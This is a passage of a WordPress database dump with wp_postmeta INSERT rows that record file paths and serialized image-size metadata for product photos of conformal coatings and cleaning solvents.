INSERT INTO `wp_postmeta` VALUES (14777, 1405, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:46:"2016/09/ms-470c-urethane-conformal-coating.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:46:"ms-470c-urethane-conformal-coating-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:46:"ms-470c-urethane-conformal-coating-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:46:"ms-470c-urethane-conformal-coating-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:48:"ms-470c-urethane-conformal-coating-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:46:"ms-470c-urethane-conformal-coating-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:46:"ms-470c-urethane-conformal-coating-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:46:"ms-470c-urethane-conformal-coating-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:46:"ms-470c-urethane-conformal-coating-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14778, 1406, '_wp_attached_file', '2016/09/ms-470s-urethane-conformal-coating.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14779, 1406, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:46:"2016/09/ms-470s-urethane-conformal-coating.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:46:"ms-470s-urethane-conformal-coating-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:46:"ms-470s-urethane-conformal-coating-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:46:"ms-470s-urethane-conformal-coating-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:48:"ms-470s-urethane-conformal-coating-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:46:"ms-470s-urethane-conformal-coating-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:46:"ms-470s-urethane-conformal-coating-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:46:"ms-470s-urethane-conformal-coating-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:46:"ms-470s-urethane-conformal-coating-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14780, 1407, '_wp_attached_file', '2016/09/ms-472S-urethane-conformal-coating.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14781, 1407, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:46:"2016/09/ms-472S-urethane-conformal-coating.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:46:"ms-472S-urethane-conformal-coating-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:46:"ms-472S-urethane-conformal-coating-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:46:"ms-472S-urethane-conformal-coating-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:48:"ms-472S-urethane-conformal-coating-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:46:"ms-472S-urethane-conformal-coating-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:46:"ms-472S-urethane-conformal-coating-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:46:"ms-472S-urethane-conformal-coating-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:46:"ms-472S-urethane-conformal-coating-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14782, 1408, '_wp_attached_file', '2016/09/ms-475c-acrylic-conformal-coating.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14783, 1408, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:45:"2016/09/ms-475c-acrylic-conformal-coating.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:45:"ms-475c-acrylic-conformal-coating-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:45:"ms-475c-acrylic-conformal-coating-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:45:"ms-475c-acrylic-conformal-coating-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:47:"ms-475c-acrylic-conformal-coating-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:45:"ms-475c-acrylic-conformal-coating-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:45:"ms-475c-acrylic-conformal-coating-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:45:"ms-475c-acrylic-conformal-coating-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:45:"ms-475c-acrylic-conformal-coating-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14784, 1409, '_wp_attached_file', '2016/09/ms-477c-acrylic-conformal-coating.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14785, 1409, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:45:"2016/09/ms-477c-acrylic-conformal-coating.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:45:"ms-477c-acrylic-conformal-coating-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:45:"ms-477c-acrylic-conformal-coating-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:45:"ms-477c-acrylic-conformal-coating-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:47:"ms-477c-acrylic-conformal-coating-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:45:"ms-477c-acrylic-conformal-coating-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:45:"ms-477c-acrylic-conformal-coating-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:45:"ms-477c-acrylic-conformal-coating-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:45:"ms-477c-acrylic-conformal-coating-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14786, 1410, '_wp_attached_file', '2016/09/ms-720l-precision-cleaning-solvent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14787, 1410, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:46:"2016/09/ms-720l-precision-cleaning-solvent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:46:"ms-720l-precision-cleaning-solvent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:46:"ms-720l-precision-cleaning-solvent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:46:"ms-720l-precision-cleaning-solvent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:48:"ms-720l-precision-cleaning-solvent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:46:"ms-720l-precision-cleaning-solvent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:46:"ms-720l-precision-cleaning-solvent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:46:"ms-720l-precision-cleaning-solvent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:46:"ms-720l-precision-cleaning-solvent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14788, 1411, '_wp_attached_file', '2016/09/ms-720-precision-cleaning-agent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14789, 1411, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:43:"2016/09/ms-720-precision-cleaning-agent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:43:"ms-720-precision-cleaning-agent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:43:"ms-720-precision-cleaning-agent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:43:"ms-720-precision-cleaning-agent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:45:"ms-720-precision-cleaning-agent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:43:"ms-720-precision-cleaning-agent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:43:"ms-720-precision-cleaning-agent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:43:"ms-720-precision-cleaning-agent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:43:"ms-720-precision-cleaning-agent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14790, 1412, '_wp_attached_file', '2016/09/ms-725-flux-remover.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14791, 1412, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:31:"2016/09/ms-725-flux-remover.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"ms-725-flux-remover-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"ms-725-flux-remover-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"ms-725-flux-remover-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"ms-725-flux-remover-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"ms-725-flux-remover-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"ms-725-flux-remover-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"ms-725-flux-remover-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"ms-725-flux-remover-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14792, 1413, '_wp_attached_file', '2016/09/ms-730-contact-re-nu.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14793, 1413, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:32:"2016/09/ms-730-contact-re-nu.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"ms-730-contact-re-nu-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"ms-730-contact-re-nu-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"ms-730-contact-re-nu-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"ms-730-contact-re-nu-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"ms-730-contact-re-nu-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"ms-730-contact-re-nu-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"ms-730-contact-re-nu-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"ms-730-contact-re-nu-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14794, 1414, '_wp_attached_file', '2016/09/ms-730l-contact-re-nu.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14795, 1414, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:33:"2016/09/ms-730l-contact-re-nu.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"ms-730l-contact-re-nu-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"ms-730l-contact-re-nu-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"ms-730l-contact-re-nu-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"ms-730l-contact-re-nu-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"ms-730l-contact-re-nu-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"ms-730l-contact-re-nu-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"ms-730l-contact-re-nu-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"ms-730l-contact-re-nu-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14796, 1415, '_wp_attached_file', '2016/09/ms-738-contact-re-nu.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14797, 1415, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:32:"2016/09/ms-738-contact-re-nu.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"ms-738-contact-re-nu-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"ms-738-contact-re-nu-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"ms-738-contact-re-nu-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"ms-738-contact-re-nu-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"ms-738-contact-re-nu-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"ms-738-contact-re-nu-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"ms-738-contact-re-nu-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"ms-738-contact-re-nu-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14798, 1416, '_wp_attached_file', '2016/09/ms-745-vertrel-xsi-silicone-solvent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14799, 1416, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:47:"2016/09/ms-745-vertrel-xsi-silicone-solvent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:47:"ms-745-vertrel-xsi-silicone-solvent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:47:"ms-745-vertrel-xsi-silicone-solvent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:47:"ms-745-vertrel-xsi-silicone-solvent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:49:"ms-745-vertrel-xsi-silicone-solvent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:47:"ms-745-vertrel-xsi-silicone-solvent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:47:"ms-745-vertrel-xsi-silicone-solvent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:47:"ms-745-vertrel-xsi-silicone-solvent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:47:"ms-745-vertrel-xsi-silicone-solvent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14800, 1417, '_wp_attached_file', '2016/09/ms-755l-solvent.jpg'); 
